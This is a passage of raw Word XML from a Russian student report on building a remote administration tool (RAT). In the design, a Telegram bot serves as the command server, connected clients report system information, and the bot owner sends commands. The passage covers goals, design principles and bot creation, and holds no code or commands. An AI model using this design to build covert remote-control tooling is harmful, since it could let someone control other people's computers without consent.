      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i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Cs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>за</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia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Cs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>первое полугодие 2018 года, процент</w:t>
      </w:r>
      <w:r w:rsidR="00E46359" w:rsidRPr="00E46359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E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>использования</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> легитимн</w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">о установленных </w:t>
      </w:r>
      <w:r w:rsidR="00E46359" w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00E46359" w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">для </w:t>
      </w:r>
      <w:r w:rsidR="001878A5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>автоматизированных систем управления</w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> не превышает 35%</w:t>
      </w:r>
      <w:r w:rsidR="00EB2B7B" w:rsidRPr="00EB2B7B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EB2B7B" w:rsidRPr="004F6A75">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00E46359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53ABC708" w14:textId="77777777" w:rsidR="008D3C85" w:rsidRPr="004F646A" w:rsidRDefault="00E46359" w:rsidP="00C563E3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За последние несколько лет</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:rPr>
          <w:rFonts w:eastAsia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Cs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>пулярность использования средств удалённого доступа выросла ввиду непрерывного роста сетей и увеличения числа клиентских машин.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF5891" w14:textId="77777777" w:rsidR="0026412E" w:rsidRDefault="006C5546" w:rsidP="0001026E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Целью</w:t>
      </w:r>
      <w:r w:rsidR="00AC075A">
        <w:t xml:space="preserve"> данной работы является раз</w:t>
      </w:r>
      <w:r>
        <w:t>работка</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:t xml:space="preserve"> инструмента удалённого администрирования</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:t>задачами которого будет сбор информации о системе,</w:t>
      </w:r>
      <w:r w:rsidR="00E35091">
        <w:t xml:space="preserve"> предоставление инструментов удалённого управления</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Проект должен включать в себя </w:t>
      </w:r>
      <w:r w:rsidR="00E35091" w:rsidRPr="00E35091">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00E35091" w:rsidRPr="00E35091">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>сервер</w:t>
      </w:r>
      <w:r w:rsidR="00E35091" w:rsidRPr="00E35091">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E35091">
        <w:t xml:space="preserve">со встроенным </w:t>
      </w:r>
      <w:r w:rsidR="00E35091" w:rsidRPr="00E35091">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="00E35091" w:rsidRPr="00E35091">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E35091">
        <w:t>сервером</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E35091">
        <w:t>клиент, подключаемый к серверу, менеджер – клиент</w:t>
      </w:r>
      <w:r w:rsidR="001E2913">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E35091">
        <w:t xml:space="preserve"> осуществляющий управление сервером и другими клиентами</w:t>
      </w:r>
      <w:r w:rsidR="004E0202">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5AAA4" w14:textId="77777777" w:rsidR="001C664C" w:rsidRPr="001C664C" w:rsidRDefault="001C664C" w:rsidP="001C664C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708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1C664C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Для достижения данной цели необходимо решить следующие задачи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A001B6" w14:textId="77777777" w:rsidR="001C664C" w:rsidRDefault="00E35091" w:rsidP="00233C2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</w:pPr>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="001C664C">
        <w:t>зучить</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C664C">
        <w:t xml:space="preserve">методы разработки </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервера с использованием </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3F87">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="001C664C">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E7C6F" w14:textId="77777777" w:rsidR="00FD3558" w:rsidRDefault="00E35091" w:rsidP="00233C2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</w:pPr>
      <w:r>
        <w:t xml:space="preserve">создать </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0359">
        <w:t>клиент</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, принимающий команды от </w:t>
      </w:r>
      <w:r w:rsidR="001878A5" w:rsidRPr="001878A5">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="001878A5" w:rsidRPr="001878A5">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>сервера</w:t>
      </w:r>
      <w:r w:rsidR="001C664C">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A88C95" w14:textId="77777777" w:rsidR="001C664C" w:rsidRDefault="00E35091" w:rsidP="00233C2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</w:pPr>
      <w:r>
        <w:t>реализовать асинхронность работы клиента и сервера</w:t>
      </w:r>
      <w:r w:rsidR="001C664C">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27261D4D" w14:textId="77777777" w:rsidR="00E35091" w:rsidRDefault="001C664C" w:rsidP="001C664C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">реализовать </w:t>
      </w:r>
      <w:r w:rsidR="00E35091">
        <w:t>систему распределённого управления клиентами</w:t>
      </w:r>
      <w:r w:rsidR="00E35091" w:rsidRPr="00E35091">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3EDF65" w14:textId="77777777" w:rsidR="00E35091" w:rsidRDefault="00E35091" w:rsidP="001C664C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>создать программу управления отдельным клиентом – менеджер</w:t>
      </w:r>
      <w:r w:rsidR="001878A5" w:rsidRPr="001878A5">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D3063" w14:textId="77777777" w:rsidR="001878A5" w:rsidRDefault="001878A5" w:rsidP="001C664C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">создать </w:t>
      </w:r>
      <w:r w:rsidRPr="001878A5">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001878A5">
        <w:t>-сервер</w:t>
      </w:r>
      <w:r>
        <w:t>, взаимодействующий с клиентами</w:t>
      </w:r>
      <w:r w:rsidRPr="001878A5">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0601D4" w14:textId="77777777" w:rsidR="00E35091" w:rsidRDefault="00E35091" w:rsidP="001C664C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>реализовать функционал у</w:t>
      </w:r>
      <w:r w:rsidR="001878A5">
        <w:t>правления клиентом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81273E" w14:textId="77777777" w:rsidR="0054305F" w:rsidRPr="001B187E" w:rsidRDefault="0054305F" w:rsidP="001C664C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001B187E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB2781" w14:textId="77777777" w:rsidR="00682657" w:rsidRPr="00951E3A" w:rsidRDefault="00D05DF5" w:rsidP="00951E3A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc104228645"/>
      <w:bookmarkStart w:id="12" w:name="_Toc105065717"/>
      <w:r w:rsidRPr="00951E3A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc91787344"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidR="001878A5">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Технология разработки клиент-серверного взаимодействия</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="42B73942" w14:textId="77777777" w:rsidR="00E24C33" w:rsidRPr="00E24C33" w:rsidRDefault="00E24C33" w:rsidP="00E24C33"/>
    <w:p w14:paraId="0A1C7810" w14:textId="77777777" w:rsidR="00E24C33" w:rsidRDefault="00E24C33" w:rsidP="00E24C33">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0136C48D" w14:textId="77777777" w:rsidR="00E24C33" w:rsidRDefault="001878A5" w:rsidP="00E24C33">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При разработке клиент-серверного взаимодействия для управления удалённо подключённой вычислительной машиной необходимо руководствоваться следующими принципами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1EF452" w14:textId="77777777" w:rsidR="00C341E7" w:rsidRDefault="00C341E7" w:rsidP="00C341E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>доступность сервера;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FAFE1" w14:textId="77777777" w:rsidR="00C341E7" w:rsidRDefault="00C341E7" w:rsidP="00C341E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">независимость клиента от наличия </w:t>
      </w:r>
      <w:r w:rsidR="001E2913">
        <w:t xml:space="preserve">непрерывного </w:t>
      </w:r>
      <w:r>
        <w:t>интернет</w:t>
      </w:r>
      <w:r w:rsidR="001E2913">
        <w:t>-соединения</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B11A8" w14:textId="77777777" w:rsidR="001E2913" w:rsidRDefault="001E2913" w:rsidP="00C341E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>высокая скорость реагирования клиента на посылаемые команды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C14419" w14:textId="77777777" w:rsidR="005F786E" w:rsidRPr="00233C23" w:rsidRDefault="001E2913" w:rsidP="00FD3558">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Следование вышеперечисленным принципам натолкнуло на создание сервера на базе кроссплатформенной системы мгновенного обмена сообщениями - </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2913">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:r w:rsidR="00FD3558" w:rsidRPr="0035135E">
        <w:rPr>
          <w:i/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E17B9" w14:textId="77777777" w:rsidR="00FD3558" w:rsidRPr="00E80D2F" w:rsidRDefault="00E80D2F" w:rsidP="00FD3558">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер организован в качестве </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80D2F">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80D2F">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">бота, к которому подключается клиент, при запуске </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80D2F">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="007F4B3A" w:rsidRPr="007F4B3A">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В качестве</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80D2F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">менеджера используется аккаунт создателя </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80D2F">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80D2F">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>бота.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0E73B" w14:textId="77777777" w:rsidR="00E80D2F" w:rsidRDefault="00E80D2F" w:rsidP="00E80D2F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При подключении клиента, сервер обрабатывает запрос и пересылает менеджеру информацию о подключённом клиенте. Менеджер, посредством передачи команд управления в чат с сервером </w:t>
      </w:r>
      <w:r w:rsidR="00FA0359">
        <w:t>отправляет команды клиенту, ожидая результат выполнения.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E737FCC" w14:textId="77777777" w:rsidR="00FF393F" w:rsidRPr="008D3C85" w:rsidRDefault="00FF393F" w:rsidP="008D3C85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAAC40" w14:textId="77777777" w:rsidR="00141563" w:rsidRPr="00FA0359" w:rsidRDefault="00D05DF5" w:rsidP="00951E3A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc104228647"/>
      <w:bookmarkStart w:id="15" w:name="_Toc105065718"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00FA0359">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00141563" w:rsidRPr="00FA0359">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Этапы разработки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1EAEBF63" w14:textId="77777777" w:rsidR="00141563" w:rsidRPr="00141563" w:rsidRDefault="00141563" w:rsidP="00141563"/>
    <w:p w14:paraId="30F0EBEB" w14:textId="77777777" w:rsidR="0026412E" w:rsidRPr="00CF3F87" w:rsidRDefault="00141563" w:rsidP="00951E3A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc104228648"/>
      <w:bookmarkStart w:id="17" w:name="_Toc105065719"/>
      <w:r w:rsidRPr="00141563">
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="00D05DF5" w:rsidRPr="00141563">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026412E" w:rsidRPr="00141563">
        <w:t xml:space="preserve">Создание </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="00C37F2D" w:rsidRPr="00C37F2D">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D" w:rsidRPr="00C37F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D" w:rsidRPr="00C37F2D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D">
        <w:t xml:space="preserve">использованием </w:t>
      </w:r>
      <w:r w:rsidR="00C37F2D" w:rsidRPr="00C37F2D">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="25975DA1" w14:textId="77777777" w:rsidR="004F6A75" w:rsidRPr="00CF3F87" w:rsidRDefault="004F6A75" w:rsidP="004F6A75"/>
    <w:p w14:paraId="3AEFB95D" w14:textId="77777777" w:rsidR="00951E3A" w:rsidRPr="007A202D" w:rsidRDefault="00951E3A" w:rsidP="00951E3A"/>
    <w:p w14:paraId="19A6F064" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRDefault="000A17BA" w:rsidP="00756350">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Создание персонального </w:t>
      </w:r>
      <w:r w:rsidRPr="000A17BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="000A17BA">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">бота начинается с обращения к аккаунту в </w:t>
      </w:r>
      <w:r w:rsidRPr="000A17BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="000A17BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с никнеймом </w:t>
      </w:r>
      <w:r w:rsidRPr="000A17BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A17BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A17BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000A17BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>В чате с данным ботом, следуя инструкциям необ</w:t>
      </w:r>
      <w:r w:rsidR="00207FAB">
        <w:t>ходимо создать бот и сгенерировать токен – ключ доступа для управления созданным ботом.</w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460EA5F" w14:textId="77777777" w:rsidR="00C37F2D" w:rsidRDefault="006A5C0D" w:rsidP="00756350">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Пример представлен на рис. 2.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C0147" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRDefault="00207FAB" w:rsidP="00C37F2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3899AE33" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRDefault="00207FAB" w:rsidP="006A5C0D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00207FAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00239478" wp14:editId="70036AD3">
            <wp:extent cx="5939790" cy="4287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B736" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRDefault="006A5C0D" w:rsidP="006A5C0D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CD86E8" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRPr="006805E4" w:rsidRDefault="00207FAB" w:rsidP="00207FAB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202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Пример обращения к </w:t>
      </w:r>
      <w:r w:rsidRPr="00207FAB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00207FAB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BBD4886" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRPr="006805E4" w:rsidRDefault="00207FAB" w:rsidP="00207FAB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37941924" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRDefault="00207FAB" w:rsidP="00207FAB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
